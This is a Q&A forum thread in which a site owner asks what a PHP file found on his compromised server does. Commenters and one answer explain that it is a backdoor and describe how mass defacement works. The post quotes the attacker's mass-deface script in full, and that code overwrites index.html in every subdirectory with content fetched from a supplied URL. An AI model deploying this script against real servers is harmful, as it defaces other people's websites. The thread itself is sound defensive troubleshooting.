What is this script running?

Asked

Viewed 102 times

5

I am beginner in the area and found this file inside my server :

<?php
/*
Script: Mass Deface Script
*/
echo "<center><textarea rows='10' cols='100'>";
$defaceurl = $_POST['massdefaceurl'];
$dir = $_POST['massdefacedir'];
echo $dir."\n";

if (is_dir($dir)) {
    if ($dh = opendir($dir)) {
        while (($file = readdir($dh)) !== false) {
                        if(filetype($dir.$file)=="dir"){
                                $newfile=$dir.$file."/index.html";
                                echo $newfile."\n";
                                if (!copy($defaceurl, $newfile)) {
                                        echo "failed to copy $file...\n";
                                }
                        }
        }
        closedir($dh);
    }
}
echo "</textarea></center>";
?>


<td align=right>Mass Defacement:</td><br>
</div>
<form action='<?php basename($_SERVER['PHP_SELF']); ?>' method='post'>
<div class="style31">
[+] Main Directory: <input type='text' style='width: 250px' value='<?php  echo getcwd() . "/"; ?>' name='massdefacedir'>
[+] Defacement Url: <input type='text' style='width: 250px' name='massdefaceurl'>
<input type='submit' name='execmassdeface' value='Execute'></div>
</form></td>

Can help me understand what this file was running ?

  • 4

    possibly a backdoor that someone has uploaded to your site. Delete this file and check its upload as it is allowing you to upload files of the php type.

  • 3

    I wouldn’t say "possibly", but "quite possibly" kkkk

  • 2

    I’d say for sure ;)

  • 1

    Make a copy to your personal computer where it can’t be used remotely. and delete it from the server now. And review what you have on your server, that somehow there’s a security breach.

  • Yes, indeed a security flaw, but what he’s executing ?

  • @Cesarlimapaulo see Marcelo’s answer.

Show 1 more comment

1 answer

3

The script returns the current directory where this file is located, checks whether it is manipulable, and creates a new index.html file.

Mass Defacement

the defacers aren’t Selective in their targets; in Most cases they just use Automated tools to find Vulnerable Servers, and Automatically exploit them. The exploit Automatically uploads a backdoor to the compromised server which will provide, for example, shell access to the compromised server. The defacer can Launch further Attacks via the backdoor, such as trying to Escalate privileges using local kernel exploits, or Reporting the compromised server to a defacement Archive. These backdoors are also sold on the black market, enabling Buyers to, for example, turn a compromised server into a Node in a Ddos network, or use it as spam Relay host.

They are target-free attacks, check vulnerable sites and exploit them, and can replace files, copy them or even use the server for spam mailing and Ddos.

That is, your site is somehow vulnerable and allowed access to the server to third parties.

Mass Defacement

  • I started searching after two websites had their index rewritten. I’m reviewing my security, I think this file has been uploaded by some sources that allowed the upload of .php. What do you think ? Now I’m worried, I have 9 sites on this server and I’m monitoring them. Can you tell me how to create an algorithm that allows my index to present me as online on a page where I can monitor. As if I had a system that informed me that my sites are ok. I want to put something that communicates with me. accurate monitoring

  • You can do this, but remember that it will be a stopgap and you must fix this security breach as soon as possible. You make a script in which open searches the directory and find index.html, open it and read the contents. Read through http://php.net/manual/en/class.directoryiterator.php http://php.net/manual/en/function.file-get-contents.php

  • @C-section The answer was not helpful/correct?

Browser other questions tagged

You are not signed in. Login or sign up in order to post.